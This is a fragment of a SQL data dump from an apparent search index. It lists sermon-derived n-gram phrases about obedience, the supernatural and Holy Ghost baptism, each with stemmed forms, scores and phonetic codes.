(256512, 'the supernatural and', 'the supernatural and', 0, 1, 1.6667, 'T216536453', 2, '*'),
(256513, 'the supernatural dimension', 'the supernatural dimension', 0, 1, 1.8667, 'T21653643525', 2, '*'),
(256514, 'the supernatural in', 'the supernatural in', 0, 1, 1.6333, 'T21653645', 2, '*'),
(256515, 'the supernatural is', 'the supernatural is', 0, 1, 1.6333, 'T21653642', 2, '*'),
(256516, 'the supernatural perhaps', 'the supernatural perhaps', 0, 1, 1.8, 'T21653641612', 2, '*'),
(256517, 'the supernatural until', 'the supernatural until', 0, 1, 1.7333, 'T2165364534', 2, '*'),
(256518, 'the woman whose', 'the woman whose', 0, 1, 1.5, 'T520', 2, '*'),
(256519, 'their lives from', 'their lives from', 0, 1, 1.5333, 'T6412165', 2, '*'),
(256520, 'them to do', 'them to do', 0, 1, 1.3333, 'T530', 2, '*'),
(256521, 'there is any', 'there is any', 0, 1, 1.4, 'T625', 2, '*'),
(256522, 'through scriptures', 'through scriptures', 0, 1, 1.6, 'T6261362', 2, '*'),
(256523, 'through scriptures we', 'through scriptures we', 0, 1, 1.7, 'T6261362', 2, '*'),
(256524, 'till date', 'till date', 0, 1, 1.3, 'T430', 3, '*'),
(256525, 'till date that\'s', 'till date that', 0, 1, 1.5333, 'T432', 2, '*'),
(256526, 'times in jordan', 'time in jordan', 0, 1, 1.5, 'T5252635', 2, '*'),
(256527, 'to be enslaved', 'to be enslaved', 0, 1, 1.4667, 'T152413', 2, '*'),
(256528, 'to come on', 'to come on', 0, 1, 1.3333, 'T250', 2, '*'),
(256529, 'to dip', 'to dip', 0, 1, 1.2, 'T100', 2, '*'),
(256530, 'to dip seven', 'to dip seven', 0, 1, 1.4, 'T1215', 2, '*'),
(256531, 'to do and', 'to do and', 0, 1, 1.3, 'T530', 2, '*'),
(256532, 'to do till', 'to do till', 0, 1, 1.3333, 'T400', 2, '*'),
(256533, 'to obey whatever', 'to obey whatever', 0, 1, 1.5333, 'T1316', 2, '*'),
(256534, 'to take the', 'to take the', 0, 1, 1.3667, 'T230', 2, '*'),
(256535, 'to the man', 'to the man', 0, 1, 1.3333, 'T500', 2, '*'),
(256536, 'to the men', 'to the men', 0, 1, 1.3333, 'T500', 2, '*'),
(256537, 'to the servants', 'to the servants', 0, 1, 1.5, 'T261532', 2, '*'),
(256538, 'to the supernatural', 'to the supernatural', 0, 1, 1.6333, 'T2165364', 2, '*'),
(256539, 'to walk on', 'to walk on', 0, 1, 1.3333, 'T425', 3, '*'),
(256540, 'today and see', 'todai and see', 0, 1, 1.4333, 'T532', 2, '*'),
(256541, 'toiled', 'toil', 0, 0, 0.4, 'T430', 2, '*'),
(256542, 'toiled all', 'toil all', 0, 1, 1.3333, 'T434', 2, '*'),
(256543, 'toiled all night', 'toil all night', 0, 1, 1.5333, 'T434523', 2, '*'),
(256544, 'told her', 'told her', 0, 1, 1.2667, 'T436', 3, '*'),
(256545, 'told her what', 'told her what', 0, 1, 1.4333, 'T4363', 2, '*'),
(256546, 'told them', 'told them', 0, 1, 1.3, 'T435', 3, '*'),
(256547, 'told them to', 'told them to', 0, 1, 1.4, 'T4353', 2, '*'),
(256548, 'too and', 'too and', 0, 1, 1.2333, 'T530', 2, '*'),
(256549, 'too and you', 'too and you', 0, 1, 1.3667, 'T530', 2, '*'),
(256550, 'until you begin', 'until you begin', 0, 1, 1.5, 'U534125', 2, '*'),
(256551, 'very serious you', 'veri serious you', 0, 1, 1.5333, 'V6262', 2, '*'),
(256552, 'walk on', 'walk on', 0, 1, 1.2333, 'W425', 3, '*'),
(256553, 'walk on water', 'walk on water', 0, 1, 1.4333, 'W42536', 2, '*'),
(256554, 'water but', 'water but', 0, 1, 1.3, 'W3613', 2, '*'),
(256555, 'water but obedience', 'water but obedience', 0, 1, 1.6333, 'W36131352', 2, '*'),
(256556, 'we see', 'we see', 0, 1, 1.2, 'W200', 2, '*'),
(256557, 'we see men', 'we see men', 0, 1, 1.3333, 'W250', 2, '*'),
(256558, 'were to', 'were to', 0, 1, 1.2333, 'W630', 2, '*'),
(256559, 'were to be', 'were to be', 0, 1, 1.3333, 'W631', 2, '*'),
(256560, 'what connects', 'what connects', 0, 1, 1.4333, 'W325232', 2, '*'),
(256561, 'what connects you', 'what connects you', 0, 1, 1.5667, 'W325232', 2, '*'),
(256562, 'whatever jesus', 'whatev jesus', 0, 1, 1.4667, 'W3162', 2, '*'),
(256563, 'whatever jesus told', 'whatev jesus told', 0, 1, 1.6333, 'W3162343', 2, '*'),
(256564, 'who obeyed', 'who obeyed', 0, 1, 1.3333, 'W130', 2, '*'),
(256565, 'who obeyed and', 'who obeyed and', 0, 1, 1.4667, 'W1353', 2, '*'),
(256566, 'who obeyed elisha', 'who obeyed elisha', 0, 1, 1.5667, 'W1342', 2, '*'),
(256567, 'who stepped', 'who stepped', 0, 1, 1.3667, 'W2313', 2, '*'),
(256568, 'who stepped out', 'who stepped out', 0, 1, 1.5, 'W2313', 2, '*'),
(256569, 'who toiled', 'who toiled', 0, 1, 1.3333, 'W343', 2, '*'),
(256570, 'who toiled all', 'who toiled all', 0, 1, 1.4667, 'W3434', 2, '*'),
(256571, 'who told', 'who told', 0, 1, 1.2667, 'W343', 2, '*'),
(256572, 'who told her', 'who told her', 0, 1, 1.4, 'W3436', 2, '*'),
(256573, 'whose', 'whose', 0, 0, 0.3333, 'W200', 3, '*'),
(256574, 'whose sons', 'whose sons', 0, 1, 1.3333, 'W252', 2, '*'),
(256575, 'whose sons were', 'whose sons were', 0, 1, 1.5, 'W2526', 2, '*'),
(256576, 'why our', 'why our', 0, 1, 1.2333, 'W600', 2, '*'),
(256577, 'why our experience', 'why our experience', 0, 1, 1.6, 'W621652', 2, '*'),
(256578, 'why you hardly', 'why you hardly', 0, 1, 1.4667, 'W634', 2, '*'),
(256579, 'will experience', 'will experience', 0, 1, 1.5, 'W421652', 2, '*'),
(256580, 'will experience the', 'will experience the', 0, 1, 1.6333, 'W4216523', 2, '*'),
(256581, 'will keep', 'will keep', 0, 1, 1.3, 'W421', 3, '*'),
(256582, 'will keep being', 'will keep being', 0, 1, 1.5, 'W42152', 2, '*'),
(256583, 'woman whose', 'woman whose', 0, 1, 1.3667, 'W520', 2, '*'),
(256584, 'woman whose sons', 'woman whose sons', 0, 1, 1.5333, 'W5252', 2, '*'),
(256585, 'wondering', 'wonder', 0, 0, 0.6, 'W53652', 3, '*'),
(256586, 'wondering why', 'wonder why', 0, 1, 1.4333, 'W53652', 2, '*'),
(256587, 'wondering why you', 'wonder why you', 0, 1, 1.5667, 'W53652', 2, '*'),
(256588, 'word mat', 'word mat', 0, 1, 1.2667, 'W6353', 2, '*'),
(256589, 'word mat 14', 'word mat 14', 0, 1, 1.3667, 'W6353', 2, '*'),
(256590, 'word of the', 'word of the', 0, 1, 1.3667, 'W6313', 2, '*'),
(256591, 'you and the', 'you and the', 0, 1, 1.3667, 'Y530', 2, '*'),
(256592, 'you begin', 'you begin', 0, 1, 1.3, 'Y125', 2, '*'),
(256593, 'you begin to', 'you begin to', 0, 1, 1.4, 'Y1253', 2, '*'),
(256594, 'you don\'t experience', 'you don experience', 0, 1, 1.6667, 'Y35321652', 2, '*'),
(256595, 'you hardly', 'you hardly', 0, 1, 1.3333, 'Y634', 2, '*'),
(256596, 'you hardly experience', 'you hardly experience', 0, 1, 1.7, 'Y63421652', 2, '*'),
(256597, 'you have kept', 'you have kept', 0, 1, 1.4333, 'Y1213', 2, '*'),
(256598, 'you may only', 'you may only', 0, 1, 1.4, 'Y540', 2, '*'),
(256599, 'you start living', 'you start living', 0, 1, 1.5333, 'Y23634152', 2, '*'),
(256600, 'you to come', 'you to come', 0, 1, 1.3667, 'Y325', 2, '*'),
(256601, 'you will experience', 'you will experience', 0, 1, 1.6333, 'Y421652', 2, '*'),
(256602, 'you will keep', 'you will keep', 0, 1, 1.4333, 'Y421', 2, '*'),
(256603, 'you you may', 'you you may', 0, 1, 1.3667, 'Y500', 2, '*'),
(256604, 'your obedience is', 'your obedience is', 0, 1, 1.5667, 'Y61352', 2, '*'),
(256605, 'your season', 'your season', 0, 1, 1.3667, 'Y625', 2, '*'),
(256606, 'your season to', 'your season to', 0, 1, 1.4667, 'Y6253', 2, '*'),
(256607, 'yourself “am', 'yourself “am', 0, 1, 1.4, 'Y62415', 2, '*'),
(256608, 'yourself “am i', 'yourself “am i', 0, 1, 1.4667, 'Y62415', 2, '*'),
(256609, '“am', '“am', 0, 0, 0.2, '“500', 2, '*'),
(256610, '“am i', '“am i', 0, 1, 1.1667, '“500', 2, '*'),
(256611, '“am i obeying', '“am i obeying', 0, 1, 1.4333, '“5152', 2, '*'),
(260575, 'olusolaareogun', 'olusolaareogun', 0, 0, 0.9333, 'O424625', 3, '*'),
(260680, 'rev olusolaareogun', 'rev olusolaareogun', 0, 1, 1.6, 'R1424625', 3, '*'),
(260706, 'servant rev olusolaareogun', 'servant rev olusolaareogun', 0, 1, 1.8667, 'S615361424625', 3, '*'),
(260736, 'that that', 'that that', 0, 1, 1.3, 'T000', 2, '*'),
(260737, 'that that was', 'that that was', 0, 1, 1.4333, 'T200', 2, '*'),
(264279, '17 be', '17 be', 0, 1, 1.1667, 'B000', 2, '*'),
(264371, 'all things are', 'all things are', 0, 1, 1.4667, 'A43526', 3, '*'),
(264382, 'and attitude', 'and attitude', 0, 1, 1.4, 'A530', 2, '*'),
(264423, 'and with', 'and with', 0, 1, 1.2667, 'A530', 2, '*'),
(264437, 'any man', 'ani man', 0, 1, 1.2333, 'A500', 2, '*'),
(264552, 'changed', 'chang', 0, 0, 0.4667, 'C523', 2, '*'),
(264646, 'for a personal', 'for a personal', 0, 1, 1.4667, 'F616254', 2, '*'),
(264747, 'his personal', 'hi personal', 0, 1, 1.4, 'H216254', 1, '*'),
(264764, 'i know that', 'i know that', 0, 1, 1.3667, 'I253', 2, '*'),
(266316, '1 cor 12', '1 cor 12', 0, 1, 1.2667, 'C600', 1, '*'),
(266317, '1 cor 2', '1 cor 2', 0, 1, 1.2333, 'C600', 1, '*'),
(266318, '1-4 10', '1-4 10', 0, 1, 1.2, '', 1, '*'),
(266319, '1-4 10 44-46', '1-4 10 44-46', 0, 1, 1.4, '', 1, '*'),
(266320, '1-6 acts', '1-6 acts', 0, 1, 1.2667, 'A232', 1, '*'),
(266321, '1-6 acts 2', '1-6 acts 2', 0, 1, 1.3333, 'A232', 1, '*'),
(266322, '10 44-46', '10 44-46', 0, 1, 1.2667, '', 1, '*'),
(266323, '12 14', '12 14', 0, 1, 1.1667, '', 1, '*'),
(266324, '12 14 john', '12 14 john', 0, 1, 1.3333, 'J500', 1, '*'),
(266325, '14 16', '14 16', 0, 1, 1.1667, '', 1, '*'),
(266326, '14 16 romans', '14 16 romans', 0, 1, 1.4, 'R520', 1, '*'),
(266327, '14 ascertain', '14 ascertain', 0, 1, 1.4, 'A2635', 1, '*'),
(266328, '14 ascertain his', '14 ascertain his', 0, 1, 1.5333, 'A26352', 1, '*'),
(266329, '14 john', '14 john', 0, 1, 1.2333, 'J500', 1, '*'),
(266330, '14 john 14', '14 john 14', 0, 1, 1.3333, 'J500', 1, '*'),
(266331, '16 romans', '16 romans', 0, 1, 1.3, 'R520', 1, '*'),
(266332, '16 romans 8', '16 romans 8', 0, 1, 1.3667, 'R520', 1, '*'),
(266333, '19 1-6', '19 1-6', 0, 1, 1.2, '', 1, '*'),
(266334, '19 1-6 acts', '19 1-6 acts', 0, 1, 1.3667, 'A232', 1, '*'),
(266335, '19 2-6', '19 2-6', 0, 1, 1.2, '', 1, '*'),
(266336, '19 2-6 acts', '19 2-6 acts', 0, 1, 1.3667, 'A232', 1, '*'),
(266337, '2 1-4', '2 1-4', 0, 1, 1.1667, '', 1, '*'),
(266338, '2 1-4 10', '2 1-4 10', 0, 1, 1.2667, '', 1, '*'),
(266339, '2 14', '2 14', 0, 1, 1.1333, '', 1, '*'),
(266340, '2 14 ascertain', '2 14 ascertain', 0, 1, 1.4667, 'A2635', 1, '*'),
(266341, '2 39', '2 39', 0, 1, 1.1333, '', 1, '*'),
(266342, '2 39 yielding', '2 39 yielding', 0, 1, 1.4333, 'Y4352', 1, '*'),
(266343, '2 4', '2 4', 0, 1, 1.1, '', 1, '*'),
(266344, '2 4 to', '2 4 to', 0, 1, 1.2, 'T000', 1, '*'),
(266345, '2-6', '2-6', 0, 0, 0.3, '', 1, '*'),
(266346, '2-6 acts', '2-6 acts', 0, 1, 1.2667, 'A232', 1, '*'),
(266347, '2-6 acts 6', '2-6 acts 6', 0, 1, 1.3333, 'A232', 1, '*'),
(266348, '39 yielding', '39 yielding', 0, 1, 1.3667, 'Y4352', 1, '*'),
(266349, '39 yielding yourself', '39 yielding yourself', 0, 1, 1.6667, 'Y43526241', 1, '*'),
(266350, '4 to', '4 to', 0, 1, 1.1333, 'T000', 1, '*'),
(266351, '4 to him', '4 to him', 0, 1, 1.2667, 'T500', 1, '*'),
(266352, '44-46', '44-46', 0, 0, 0.5, '', 1, '*'),
(266353, '6 6', '6 6', 0, 1, 1.1, '', 1, '*'),
(266354, '6 6 it', '6 6 it', 0, 1, 1.2, 'I300', 1, '*'),
(266355, '6 it', '6 it', 0, 1, 1.1333, 'I300', 1, '*'),
(266356, '6 it should', '6 it should', 0, 1, 1.3667, 'I3243', 1, '*'),
(266357, '9 how', '9 how', 0, 1, 1.1667, 'H000', 1, '*'),
(266358, '9 how to', '9 how to', 0, 1, 1.2667, 'H300', 1, '*'),
(266359, 'a copy', 'a copy', 0, 1, 1.2, 'A210', 1, '*'),
(266360, 'a copy of', 'a copy of', 0, 1, 1.3, 'A210', 1, '*'),
(266361, 'a demonic', 'a demonic', 0, 1, 1.3, 'A352', 1, '*'),
(266362, 'a demonic manifestation', 'a demonic manifestation', 0, 1, 1.7667, 'A35251235', 1, '*'),
(266363, 'a fast', 'a fast', 0, 1, 1.2, 'A123', 1, '*'),
(266364, 'a fast way', 'a fast way', 0, 1, 1.3333, 'A123', 1, '*'),
(266365, 'a genuine called', 'a genuine called', 0, 1, 1.5333, 'A25243', 1, '*'),
(266366, 'a servant', 'a servant', 0, 1, 1.3, 'A26153', 1, '*'),
(266367, 'a servant of', 'a servant of', 0, 1, 1.4, 'A261531', 1, '*'),
(266368, 'a sinner one', 'a sinner one', 0, 1, 1.4, 'A2565', 1, '*'),
(266369, 'acts 19', 'act 19', 0, 1, 1.2333, 'A232', 1, '*'),
(266370, 'acts 19 1-6', 'act 19 1-6', 0, 1, 1.3667, 'A232', 1, '*'),
(266371, 'acts 19 2-6', 'act 19 2-6', 0, 1, 1.3667, 'A232', 1, '*'),
(266372, 'acts 2', 'act 2', 0, 1, 1.2, 'A232', 1, '*'),
(266373, 'acts 2 1-4', 'act 2 1-4', 0, 1, 1.3333, 'A232', 1, '*'),
(266374, 'acts 2 39', 'act 2 39', 0, 1, 1.3, 'A232', 1, '*'),
(266375, 'acts 2 4', 'act 2 4', 0, 1, 1.2667, 'A232', 1, '*'),
(266376, 'acts 6', 'act 6', 0, 1, 1.2, 'A232', 1, '*'),
(266377, 'acts 6 6', 'act 6 6', 0, 1, 1.2667, 'A232', 1, '*'),
(266378, 'advantage which', 'advantag which', 0, 1, 1.5, 'A31532', 1, '*'),
(266379, 'advantage which is', 'advantag which is', 0, 1, 1.6, 'A31532', 1, '*'),
(266380, 'after you if', 'after you if', 0, 1, 1.4, 'A1361', 1, '*'),
(266381, 'again 1', 'again 1', 0, 1, 1.2333, 'A250', 1, '*'),
(266382, 'again 1 cor', 'again 1 cor', 0, 1, 1.3667, 'A2526', 1, '*'),
(266383, 'against the believer', 'against the believer', 0, 1, 1.6667, 'A25231416', 1, '*'),
(266384, 'an advantage which', 'an advantage which', 0, 1, 1.6, 'A531532', 1, '*'),
(266385, 'and for generations', 'and for generations', 0, 1, 1.6333, 'A5316256352', 1, '*'),
(266386, 'and get him', 'and get him', 0, 1, 1.3667, 'A53235', 1, '*'),
(266387, 'and praying', 'and praying', 0, 1, 1.3667, 'A531652', 1, '*'),
(266388, 'and praying for', 'and praying for', 0, 1, 1.5, 'A53165216', 1, '*'),
(266389, 'and the unbeliever', 'and the unbeliever', 0, 1, 1.6, 'A5351416', 1, '*'),
(266390, 'and then pray', 'and then pray', 0, 1, 1.4333, 'A53516', 1, '*'),
(266391, 'and your children', 'and your children', 0, 1, 1.5667, 'A53624365', 1, '*'),
(266392, 'applying', 'appli', 0, 0, 0.5333, 'A1452', 1, '*'),
(266393, 'applying faith', 'appli faith', 0, 1, 1.4667, 'A145213', 1, '*'),
(266394, 'applying faith and', 'appli faith and', 0, 1, 1.6, 'A14521353', 1, '*'),
(266395, 'are coming', 'ar coming', 0, 1, 1.3333, 'A6252', 1, '*'),
(266396, 'are coming after', 'ar coming after', 0, 1, 1.5333, 'A6252136', 1, '*'),
(266397, 'as they come', 'as they come', 0, 1, 1.4, 'A2325', 1, '*'),
(266398, 'ascertain', 'ascertain', 0, 0, 0.6, 'A2635', 1, '*'),
(266399, 'ascertain his', 'ascertain his', 0, 1, 1.4333, 'A26352', 1, '*'),
(266400, 'ascertain his conversion', 'ascertain his conversion', 0, 1, 1.8, 'A2635251625', 1, '*'),
(266401, 'asking for', 'ask for', 0, 1, 1.3333, 'A25216', 1, '*'),
(266402, 'asking for him', 'ask for him', 0, 1, 1.4667, 'A252165', 1, '*'),
(266403, 'baptism acts', 'baptism acts', 0, 1, 1.4, 'B325232', 1, '*'),
(266404, 'baptism acts 2', 'baptism acts 2', 0, 1, 1.4667, 'B325232', 1, '*'),
(266405, 'baptism because', 'baptism because', 0, 1, 1.5, 'B32512', 1, '*'),
(266406, 'baptism because the', 'baptism because the', 0, 1, 1.6333, 'B325123', 1, '*'),
(266407, 'baptism don\'t', 'baptism don', 0, 1, 1.4333, 'B325353', 1, '*'),
(266408, 'baptism don\'t teach', 'baptism don teach', 0, 1, 1.6333, 'B3253532', 1, '*'),
(266409, 'baptism to', 'baptism to', 0, 1, 1.3333, 'B3253', 1, '*'),
(266410, 'baptism to a', 'baptism to a', 0, 1, 1.4, 'B3253', 1, '*'),
(266411, 'baptism to you', 'baptism to you', 0, 1, 1.4667, 'B3253', 1, '*'),
(266412, 'be noted', 'be noted', 0, 1, 1.2667, 'B530', 1, '*'),
(266413, 'be noted that', 'be noted that', 0, 1, 1.4333, 'B530', 1, '*'),
(266414, 'because the promise', 'becaus the promise', 0, 1, 1.6333, 'B231652', 1, '*'),
(266415, 'begin to speak', 'begin to speak', 0, 1, 1.4667, 'B253212', 1, '*'),
(266416, 'believer and the', 'believ and the', 0, 1, 1.5333, 'B41653', 1, '*'),
(266417, 'believer has', 'believ has', 0, 1, 1.4, 'B4162', 1, '*'),
(266418, 'believer has an', 'believ has an', 0, 1, 1.5, 'B41625', 1, '*'),
(266419, 'beyond speaking', 'beyond speaking', 0, 1, 1.5, 'B5321252', 1, '*'),
(266420, 'beyond speaking in', 'beyond speaking in', 0, 1, 1.6, 'B53212525', 1, '*'),
(266421, 'born again 1', 'born again 1', 0, 1, 1.4, 'B6525', 1, '*'),
(266422, 'but the believer', 'but the believer', 0, 1, 1.5333, 'B31416', 1, '*'),
(266423, 'by asking', 'by asking', 0, 1, 1.3, 'B252', 1, '*'),
(266424, 'by asking for', 'by asking for', 0, 1, 1.4333, 'B25216', 1, '*'),
(266425, 'by laying', 'by laying', 0, 1, 1.3, 'B452', 1, '*'),
(266426, 'by laying his', 'by laying his', 0, 1, 1.4333, 'B452', 1, '*'),
(266427, 'by laying on', 'by laying on', 0, 1, 1.4, 'B4525', 1, '*'),
(266428, 'called minister', 'call minister', 0, 1, 1.5, 'C435236', 1, '*'),
(266429, 'called minister of', 'call minister of', 0, 1, 1.6, 'C4352361', 1, '*'),
(266430, 'came against the', 'came against the', 0, 1, 1.5333, 'C52523', 1, '*'),
(266431, 'children acts', 'children acts', 0, 1, 1.4333, 'C4365232', 1, '*'),
(266432, 'children acts 2', 'children acts 2', 0, 1, 1.5, 'C4365232', 1, '*'),
(266433, 'come don\'ts', 'come don', 0, 1, 1.3667, 'C53532', 1, '*'),
(266434, 'come don\'ts of', 'come don of', 0, 1, 1.4667, 'C535321', 1, '*'),
(266435, 'come upon', 'come upon', 0, 1, 1.3, 'C515', 1, '*'),
(266436, 'come upon you', 'come upon you', 0, 1, 1.4333, 'C515', 1, '*'),
(266437, 'coming after', 'come after', 0, 1, 1.4, 'C52136', 1, '*'),
(266438, 'coming after you', 'come after you', 0, 1, 1.5333, 'C52136', 1, '*'),
(266439, 'conversion', 'convers', 0, 0, 0.6667, 'C51625', 1, '*'),
(266440, 'conversion first', 'convers first', 0, 1, 1.5333, 'C516251623', 1, '*'),
(266441, 'conversion first lastly', 'convers first lastly', 0, 1, 1.7667, 'C5162516234234', 1, '*'),
(266442, 'copy of “what', 'copi of “what', 0, 1, 1.4333, 'C130', 1, '*'),
(266443, 'cor 12', 'cor 12', 0, 1, 1.2, 'C600', 1, '*'),
(266444, 'cor 12 14', 'cor 12 14', 0, 1, 1.3, 'C600', 1, '*'),
(266445, 'cor 2', 'cor 2', 0, 1, 1.1667, 'C600', 1, '*'),
(266446, 'cor 2 14', 'cor 2 14', 0, 1, 1.2667, 'C600', 1, '*'),
(266447, 'demonic manifestation', 'demon manifestation', 0, 1, 1.7, 'D5251235', 1, '*'),
(266448, 'demonic manifestation for', 'demon manifestation for', 0, 1, 1.8333, 'D525123516', 1, '*'),
(266449, 'desire him', 'desir him', 0, 1, 1.3333, 'D265', 1, '*'),
(266450, 'desire him you', 'desir him you', 0, 1, 1.4667, 'D265', 1, '*'),
(266451, 'discouraged if', 'discourag if', 0, 1, 1.4667, 'D26231', 1, '*'),
(266452, 'discouraged if he', 'discourag if he', 0, 1, 1.5667, 'D26231', 1, '*'),
(266453, 'doesn\'t speak', 'doesn speak', 0, 1, 1.4333, 'D253212', 1, '*'),
(266454, 'doesn\'t speak immediately', 'doesn speak immediately', 0, 1, 1.8333, 'D253212534', 1, '*'),
(266455, 'don\'t equal', 'don equal', 0, 1, 1.3667, 'D5324', 1, '*'),
(266456, 'don\'t equal hallelujah', 'don equal hallelujah', 0, 1, 1.7333, 'D53242', 1, '*'),
(266457, 'don\'t get discouraged', 'don get discouraged', 0, 1, 1.7, 'D53232623', 1, '*'),
(266458, 'don\'t minister', 'don minister', 0, 1, 1.4667, 'D535236', 1, '*'),
(266459, 'don\'t minister holy', 'don minister holy', 0, 1, 1.6333, 'D5352364', 1, '*'),
(266460, 'don\'t mistake', 'don mistake', 0, 1, 1.4333, 'D535232', 1, '*'),
(266461, 'don\'t mistake a', 'don mistake a', 0, 1, 1.5, 'D535232', 1, '*'),
(266462, 'don\'t teach', 'don teach', 0, 1, 1.3667, 'D532', 1, '*'),
(266463, 'don\'t teach him', 'don teach him', 0, 1, 1.5, 'D5325', 1, '*'),
(266464, 'don\'ts', 'don', 0, 0, 0.4, 'D532', 2, '*'),
(266465, 'don\'ts of', 'don of', 0, 1, 1.3, 'D5321', 2, '*'),
(266466, 'don\'ts of the', 'don of the', 0, 1, 1.4333, 'D53213', 2, '*'),
(266467, 'e you', 'e you', 0, 1, 1.1667, 'E000', 1, '*'),
(266468, 'e you personally', 'e you personally', 0, 1, 1.5333, 'E16254', 1, '*'),
(266469, 'encourage him', 'encourag him', 0, 1, 1.4333, 'E52625', 1, '*'),
(266470, 'encourage him beyond', 'encourag him beyond', 0, 1, 1.6667, 'E52625153', 1, '*'),
(266471, 'encourage him to', 'encourag him to', 0, 1, 1.5333, 'E526253', 1, '*'),
(266472, 'equal', 'equal', 0, 0, 0.3333, 'E240', 1, '*'),
(266473, 'equal hallelujah', 'equal hallelujah', 0, 1, 1.5333, 'E242', 1, '*'),
(266474, 'equal hallelujah in', 'equal hallelujah in', 0, 1, 1.6333, 'E2425', 1, '*'),
(266475, 'evidence of the', 'evid of the', 0, 1, 1.5, 'E135213', 1, '*'),
(266476, 'faith and get', 'faith and get', 0, 1, 1.4333, 'F35323', 1, '*'),
(266477, 'fast way', 'fast way', 0, 1, 1.2667, 'F230', 1, '*'),
(266478, 'fast way to', 'fast way to', 0, 1, 1.3667, 'F230', 1, '*'),
(266479, 'first lastly', 'first lastly', 0, 1, 1.4, 'F6234234', 1, '*'),
(266480, 'first lastly encourage', 'first lastly encourage', 0, 1, 1.7333, 'F62342345262', 1, '*'),
(266481, 'for generations', 'for generations', 0, 1, 1.5, 'F6256352', 1, '*'),
(266482, 'for generations that', 'for generations that', 0, 1, 1.6667, 'F62563523', 1, '*'),
(266483, 'for him encourage', 'for him encourage', 0, 1, 1.5667, 'F65262', 1, '*'),
(266484, 'for him in', 'for him in', 0, 1, 1.3333, 'F650', 1, '*'),
(266485, 'for holy', 'for holy', 0, 1, 1.2667, 'F640', 1, '*'),
(266486, 'for holy ghost', 'for holy ghost', 0, 1, 1.4667, 'F6423', 1, '*'),
(266487, 'for you acts', 'for you acts', 0, 1, 1.4, 'F6232', 1, '*'),
(266488, 'for you now', 'for you now', 0, 1, 1.3667, 'F650', 1, '*'),
(266489, 'generations', 'gener', 0, 0, 0.7333, 'G56352', 1, '*'),
(266490, 'generations that', 'gener that', 0, 1, 1.5333, 'G563523', 1, '*'),
(266491, 'generations that are', 'gener that are', 0, 1, 1.6667, 'G5635236', 1, '*'),
(266492, 'genuine called', 'genuin called', 0, 1, 1.4667, 'G5243', 1, '*'),
(266493, 'genuine called minister', 'genuin called minister', 0, 1, 1.7667, 'G52435236', 1, '*'),
(266494, 'get discouraged', 'get discouraged', 0, 1, 1.5, 'G32623', 1, '*'),
(266495, 'get discouraged if', 'get discouraged if', 0, 1, 1.6, 'G326231', 1, '*'),
(266496, 'get him', 'get him', 0, 1, 1.2333, 'G350', 1, '*'),
(266497, 'get him a', 'get him a', 0, 1, 1.3, 'G350', 1, '*'),
(266498, 'ghost baptism acts', 'ghost baptism acts', 0, 1, 1.6, 'G31325232', 1, '*'),
(266499, 'ghost baptism because', 'ghost baptism because', 0, 1, 1.7, 'G3132512', 1, '*'),
(266500, 'ghost baptism don\'t', 'ghost baptism don', 0, 1, 1.6333, 'G31325353', 1, '*'),
(266501, 'ghost baptism to', 'ghost baptism to', 0, 1, 1.5333, 'G313253', 1, '*'),
(266502, 'ghost is', 'ghost is', 0, 1, 1.2667, 'G320', 1, '*'),
(266503, 'ghost is meant', 'ghost is meant', 0, 1, 1.4667, 'G3253', 1, '*'),
(266504, 'ghost move', 'ghost move', 0, 1, 1.3333, 'G351', 1, '*'),
(266505, 'ghost move don\'t', 'ghost move don', 0, 1, 1.5333, 'G351353', 1, '*'),
(266506, 'ghost receive', 'ghost receive', 0, 1, 1.4333, 'G3621', 1, '*'),
(266507, 'ghost receive the', 'ghost receive the', 0, 1, 1.5667, 'G36213', 1, '*'),
(266508, 'ghost the', 'ghost the', 0, 1, 1.3, 'G300', 2, '*'),
(266509, 'ghost the power', 'ghost the power', 0, 1, 1.5, 'G316', 1, '*'),
(266510, 'god a', 'god a', 0, 1, 1.1667, 'G300', 1, '*'),
(266511, 'god a genuine', 'god a genuine', 0, 1, 1.4333, 'G325', 1, '*'),
(266512, 'god is going', 'god is going', 0, 1, 1.4, 'G3252', 3, '*'),
(266513, 'god minister', 'god minister', 0, 1, 1.4, 'G35236', 1, '*'),
(266514, 'god minister holy', 'god minister holy', 0, 1, 1.5667, 'G352364', 1, '*'),
(266515, 'going to come', 'go to come', 0, 1, 1.4333, 'G52325', 1, '*'),
(266516, 'hallelujah', 'hallelujah', 0, 0, 0.6667, 'H420', 1, '*'),
(266517, 'hallelujah in', 'hallelujah in', 0, 1, 1.4333, 'H425', 1, '*'),
(266518, 'hallelujah in a', 'hallelujah in a', 0, 1, 1.5, 'H425', 1, '*'),
(266519, 'hands of', 'hand of', 0, 1, 1.2667, 'H5321', 1, '*'),
(266520, 'hands of a', 'hand of a', 0, 1, 1.3333, 'H5321', 1, '*'),
(266521, 'hands on you', 'hand on you', 0, 1, 1.4, 'H5325', 1, '*'),
(266522, 'has an', 'ha an', 0, 1, 1.2, 'H250', 2, '*'),
(266523, 'has an advantage', 'ha an advantage', 0, 1, 1.5333, 'H2531532', 1, '*'),
(266524, 'have to understand', 'have to understand', 0, 1, 1.6, 'H135362353', 1, '*'),
(266525, 'he doesn\'t', 'he doesn', 0, 1, 1.3333, 'H3253', 1, '*'),
(266526, 'he doesn\'t speak', 'he doesn speak', 0, 1, 1.5333, 'H3253212', 1, '*'),
(266527, 'him a copy', 'him a copy', 0, 1, 1.3333, 'H521', 1, '*'),
(266528, 'him and then', 'him and then', 0, 1, 1.4, 'H535', 1, '*'),
(266529, 'him beyond', 'him beyond', 0, 1, 1.3333, 'H5153', 1, '*'),
(266530, 'him beyond speaking', 'him beyond speaking', 0, 1, 1.6333, 'H515321252', 1, '*'),
(266531, 'him encourage', 'him encourage', 0, 1, 1.4333, 'H5262', 1, '*'),
(266532, 'him encourage him', 'him encourage him', 0, 1, 1.5667, 'H52625', 1, '*'),
(266533, 'him study', 'him study', 0, 1, 1.3, 'H523', 1, '*'),
(266534, 'him study 1', 'him study 1', 0, 1, 1.3667, 'H523', 1, '*'),
(266535, 'him to keep', 'him to keep', 0, 1, 1.3667, 'H5321', 1, '*'),
(266536, 'him to start', 'him to start', 0, 1, 1.4, 'H532363', 1, '*'),
(266537, 'him you have', 'him you have', 0, 1, 1.4, 'H510', 1, '*'),
(266538, 'him your own', 'him your own', 0, 1, 1.4, 'H565', 1, '*'),
(266539, 'his conversion', 'hi conversion', 0, 1, 1.4667, 'H251625', 1, '*'),
(266540, 'his conversion first', 'hi conversion first', 0, 1, 1.6667, 'H2516251623', 1, '*'),
(266541, 'his hands on', 'hi hands on', 0, 1, 1.4, 'H25325', 1, '*'),
